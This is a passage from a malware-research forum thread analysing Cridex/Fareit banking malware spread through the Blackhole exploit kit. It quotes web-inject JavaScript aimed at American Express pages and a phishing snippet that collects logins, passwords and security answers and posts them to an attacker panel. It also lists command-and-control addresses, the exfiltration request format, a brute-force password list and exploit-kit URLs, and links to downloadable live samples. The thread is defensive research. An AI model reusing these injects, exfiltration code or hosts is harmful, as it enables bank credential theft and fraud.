     document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
   } else {
     var i = null;
     if (document.cookie && document.cookie != "") {
       var j = document.cookie.split(";");
       for (var k = 0; k < j.length; k++) {
         var l = jQuery.trim(j[k]);
         if (l.substring(0, a.length + 1) == a + "=") {
           i = decodeURIComponent(l.substring(a.length + 1));
           break
         }
       }
     }
     return i
   }
 };
 if ($.cookie("trusted_rapport"));
 else
 $(document).ready(function() {
   $('.comingSoonPop').remove();
   $('.comingSoonTransLayer').remove();
   $("#dialog").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99998
   });
   $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>')
 })
 </script>
 ]]></replacement></modify></actions></httpinject><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[^https://.*?\.americanexpress\.com]]></url></conditions><actions><modify><pattern><![CDATA[</html>(.*?)]]></pattern><replacement><![CDATA[
 <script type="text/javascript">
 // remove saved IDs
 Delete_Cookie("profile", "/", ".americanexpress.com");
 var UsernameField = document.getElementById('Username');
 if(UsernameField) {
   UsernameField.value = '';
   UsernameField.blur();

Fareit Mothership Sent Method:

Code: Select all

"Redirecting data to POST.."
   ＜redirect＞＜pattern＞jQuatro.js＜/pattern＞
   ＜process＞＜![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]＞＜/process＞
   ＜/redirect＞＜/redirects＞
    
"BOTNET Connection..."
   ＜bconnect＞85.143.166.72:443＜/bconnect＞
   ＜httpinjects＞＜httpinject＞＜conditions＞

Fareit Callbacks HOSTS:

Code: Select all

h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php

Using below HTTP/POST format:

Code: Select all

POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}

Fareit Phishing code:

Code: Select all

var info = encodeURIComponent（'Login='+$（'input#EmployerLogin1_cbsys_login_email'）.
val（）+"\n"+'Password='+$（'input#EmployerLogin1_cbsys_login_password'）.
val（）+"\n"+$（'input[name=q1]'）.
val（）+'='+$（'input[name=a1]'）.
val（）+"\n"+$（'input[name=q2]'）.
val（）+'='+$（'input[name=a2]'）.
val（）+"\n"+$（'input[name=q3]'）.
val（）+'='+$（'input[name=a3]'）.

Fake Credit Card Processing:

Code: Select all

function check_cc(cardnumber) {
     var cardNo = cardnumber.replace(/[^0-9]/g, "");
     if (cardNo.length < 15 || cardNo.length > 16) {
       return false;
     }
     var checksum = 0;
     var j = 1;
     var calc;
     for (i = cardNo.length - 1; i ＞= 0; i--) {
       calc = Number(cardNo.charAt(i)) * j;
       if (calc ＞ 9) {
         checksum = checksum + 1;
         calc = calc - 10;
       }
       checksum = checksum + calc;
       if (j == 1) {
         j = 2;
       } else {
         j = 1;
       }
     ｝
     if (checksum % 10 != 0) {
       return false;
     ｝

Fareit Slurped Software's Credential List:http://pastebin.com/6FvcaRBf

Brute Password in Parfeit bins:

Code: Select all

phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty     soccer     happy    shadow     faith      iloveyo
jesus      superman   matrix   christ     summer     mustang
abc123     michael    pass     sunshine   ashley     helpme
letmein    cheese     aaaaaa   master     buster     justin
test       internet   amanda   computer   heaven     jasmine
love       joshua     nothing  princess   pepper     orange
password1  fuckyou    ginger   tigger     hunter     testing
hello      blessed    mother   football   lovely     apple
monkey     baseball   snoopy   angel      andrew     michell
dragon     starwars   jessica  jesus1     thomas     peace
trustno1   purple     welcome  whatever   angels     secret
freedom    charlie    grace killer     daniel     william
jennifer     :

Admin Panel:

Code: Select all

var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';

Admin Panel sent variable strings (NEW!)

Code: Select all

var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']()

Now looks not accepting people knocking anymore...

Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
#MalwareMustDie!

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17742 by Buster_BSA
Thu Jan 17, 2013 10:55 pm

Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685

Archive Download Blocked

Username

Buster_BSA

Posts

390

Joined

Mon Mar 22, 2010 6:42 am

Re: Worm:Win32/Cridex

#17743 by unixfreaxjp
Thu Jan 17, 2013 11:13 pm

Buster_BSA wrote:Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
Archive Download Blocked

Oh, my..
I'm new in kernelmode, did not know there's an upload feature.
Figured it now. There you go, enjoy! =unixfreaxjp=

Attachments

BHEK-Cridex-Fareit-20120117.rar

Blackhole2.1-Cridex-Fareit-Sample-2013-01-17/18-malwaremustdie
(226.5 KiB) Downloaded 84 times

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17749 by unixfreaxjp
Fri Jan 18, 2013 6:21 am

New infection via Spam Lead to the same Cridex payload was just detected today.
Landing page:h00p://dfudont.ru:8080/forum/links/column.php
Payload downloads:

Code: Select all

http://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m

↑Same payload as previous findings, seems the moronz couldn't make new payload delivery on time :D
The Jars has slight changes in order to adjust to new domains, same exploits.
Pocs:

Anyway: new JARS, Plugindetect/Landing page and payloads I attached as samples, enjoy!
Be free to analyze deeper, please help to send to AV vendors since infector's detection ratio is still low, and they can change the payload anytime they want..
Further report: http://malwaremustdie.blogspot.jp/2013/ ... s.html#new
Special thank's to @Xylit0l for inviting me to this wonderful community. Hope to learn & contribute more! respect K.M.!
#MalwareMustDie!

Attachments

BHEK-Cridex-Fareit-2013-01-18-2.rar

The cridex for today (unchanged) the JARs, Landing Page Script was changed.
(209.91 KiB) Downloaded 88 times

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17882 by unixfreaxjp
Sun Jan 27, 2013 10:08 am

First of al thank's forXylit0l for inviting mehere, I(ll try to contribute the best I can. And to all of you who share for malware research in KernelMode, respect!
The new updates was detected in on Cridex/PWS infector I follow. I was writing it the analysis as details as possible in MalwareMustDie post here: http://malwaremustdie.blogspot.jp/2013/ ... prove.html , but I will share here the deeper details. Here we go.

Source of infection is same, spam leads to redirector to BHEK, they use 2.1, kinda dulll to see same scheme over and over again. You'll see the spam used for this infection here: http://blog.dynamoo.com/2013/01/ups-spa ... omaru.html
The redirector of this i.e.: h00p://www.tounichi-g.co.jp/info.htm
All of for landing page here: h00p://eziponoma.ru:8080/forum/links/column.php
Grabbed all samples and share you exploits and payload used as per I pasted here: http://pastebin.com/raw.php?i=St6E6Rjr
(was too long to write it here)

My point is, in this Cridex infection the below NEW development was detected:

Code: Select all

1. The usage of the   encryption is getting deeper, they encrypted the data
   up to the memory level now. 
2. The attempt to avoid capture also detected, the cridex was running about 
   3 sec & following by the KB*.exe which runs for about less than 5mins.
   The cmd was executed in a glimpse, and see my PCAP & file capture data 
   to view the time/speed of this new things. All is just to prevent someone
   making a post like this :-) 
3. The attempt to (need to follow this further) change system internals 
   was detected, system files in my TestPC got so corrupted & won't restart.
   The possibility of the bootkit made this becoming very interesting &
   if the theory is right, they just increased their cybercrime level
   from stealer to ransom ＜ need the to dig-in SERIOUSLY!
4. More profile capture detected & more sent data template seen.
   Thus now they have the attachment file API code in POST session
5. The desktop data was captured and saved in registry (NEW)

1. How far the encryption go? Far!
For the Cridex sample If you unpack the sample (in my case is about.exe) you'll see what the bad guys allow you to see, thus there are trace of the garbled parts which still show the encrypted strings that they don't allow us to see.
i.e. See the part of the unpack file of the Cridex:

i.e.2. See the part of the unpack binary of "Fareit"/KB00777165.exe:

The marked green one shows the same pattern of encryption, while the yellow marked one is supposed to be password to be used after decrypted. Moreover the sent data is having the same pattern:

2. The speed in execution
It was calibrated to execute stuff in faster way, other than the logs of file I/O I captured in the MalwareMustDie blog, you'll see the timeline overall log I upload for the explorer.exe during the infection: http://www.mediafire.com/?cojctz3hcubecoe
I breakdown the process ID for this log too as per below table
PID 2116 - about.exe http://pastebin.com/raw.php?i=GGFyU3GH
PID 2152 - cmd.exe http://pastebin.com/raw.php?i=4GgvdGSU
PID 4128 - exp%n.tmp.exe http://pastebin.com/raw.php?i=tdYAz3k8
PID 1896 - KB00777165.exe http://pastebin.com/raw.php?i=xXTs3Nwz

3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:

Code: Select all

HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\
Process Monitor\FilterRules: 01 13 00 00 00 75 9C 00 00 00 00 00 00 00 18 00 00
00 50 00 72 00 6F 00 63 00 6D 00 6F 00 6E 00 2E 00 65 00 78 00 65 00 00
00 00 00 00 00 00 00 00 00 75 9C 00 00 00 00 00 00 00 0E 00 00 00 53 00
79 00 73 00 74 00 65 00 6D 00 00 00 00 00 00 00 00 00 00 00 77 9C 00 00
                       :
72 00 65 00 00 00 00 00 00 00 00 00 00 00 87 9C 00 00 05 00 00 00 00 10
00 00 00 24 00 55 00 70 00 43 00 61 00 73 00 65 00 00 00 00 00 00 00 00
00 00 00 87 9C 00 00 06 00 00 00 00 10 00 00 00 24 00 45 00 78 00 74 00
65 00 6E 00 64 00 00 00 00 00 00 00 00 00 00 00 92 9C 00 00 00 00 00 00
00 14 00 00 00 50 00 72 00 6F 00 66 00 69 00 6C 00 69 00 6E 00 67 00 00
00 00 00 00 00 00 00 00 00

With this blob actually looks like this:

↑The system root, its information was clearly stated there. The question is why?
and again I cannot even restart my TestPC after reboot, which showing the system files has changed.
This is something new, need to be seek deeper and further.

4. Captures
The captured data functionality was also saved in the registry, I wonder why the did this,
found the below blobs:

Code: Select all

HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\
Shell\Bags\1\Desktop\ItemPos1024x768(1): 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 17 00 00 00 A6 00 00 00 14 00 1F 48
BA 8F 0D 45 25 AD D0 11 98 A8 08 00 36 1B 11 03 17 00 00 00 02 00
00 00 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D
17 00 00 00 54 00 00 00 14 00 1F 58 60 2C 8D 20 EA 3A 69 10 A2 D7
      :
01 00 3A 42 48 4D 20 00 61 62 6F 75 74 33 2E 65 78 65 00 00 2C 00
03 00 04 00 EF BE 3A 42 E5 5B 39 42 00 78 14 00 00 00 61 00 62 00
6F 00 75 00 74 00 33 00 2E 00 65 00 78 00 65 00 00 00 1A 00 B3 00
00 00 02 00 00 00 00 00 00 00

Which means:

↑Those are the shortcuts data I used in the desktop of my TestPC actually. They snapshot'ed it.
Furthermore, while reversing about.exe I found:

Code: Select all

0x001AB8   Content-Disposition
0x001ACD   name="
0x001AD5   filename="

and

Code: Select all

0x001CAE   Content-Disposition: attachment; filename=%S

↑This part is new, at least for me. looks the uploader of file was in the logic now.
Seeking this further, if you see the config of fareit I recoded it nicely to see here-->>http://pastebin.com/H9kY7bbX
...will explain its correlation to phishing functionality.

During the detection traffic communication, I found only view hostnames receiving the POST requested, which are:

Mostly the other server wasn't receiving the requets well:

I uploaded latest sample here. and for the unpack Crudex, Horgh looks uploaded it already in VT here: https://www.virustotal.com/file/a8de1b6 ... /analysis/
For the analysis data, captures and etc, I am not promoting anything but to centralized the data please grab it from malwaremustdie post of this case here http://malwaremustdie.blogspot.jp/2013/ ... prove.html

PS: please add information in reply, will be thankful if you also add / paste the evidence to share.
Kindly regards! @unixfreaxjp
#MalwareMustDie!

Attachments

Cridex-Fareit-BHEK-20130126.7z

The samples of this case. For the PCAP, RegShot, Memory captures, FileI/O logs, kindly fetch it from MMD blog.
(246.96 KiB) Downloaded 74 times

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17886 by rinn
Sun Jan 27, 2013 12:08 pm

Hello.

3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:

Sysinternals, and this registry key belongs to Process Monitor you or one of your forensic tools are using.

is this written to registry as REG_BINARY data

Best Regards,
-rin

Username

rinn

Posts

Joined

Thu Nov 15, 2012 6:14 am

Location

Japan

Re: Worm:Win32/Cridex

#17888 by unixfreaxjp
Sun Jan 27, 2013 12:36 pm

rinn wrote:Hello.

3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Sysinternals, and this registry key belongs to ProcessMonitor you or one of your forensic tools are using.
is this written to registry as REG_BINARY data
-rin

It was the first time using Proces monitor for monitoring this, thank you for your information.
I'll have it remember for the next time, how about the other registry blob who shot the desktop info,
was it coming from process monitor too? I must dig more about this tool..In the mean time I revoke analysis related to the related point mentioned.

rgds

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Options
150 posts
Page 5 of 15
Jump to page #

Page 5 of 15
150 posts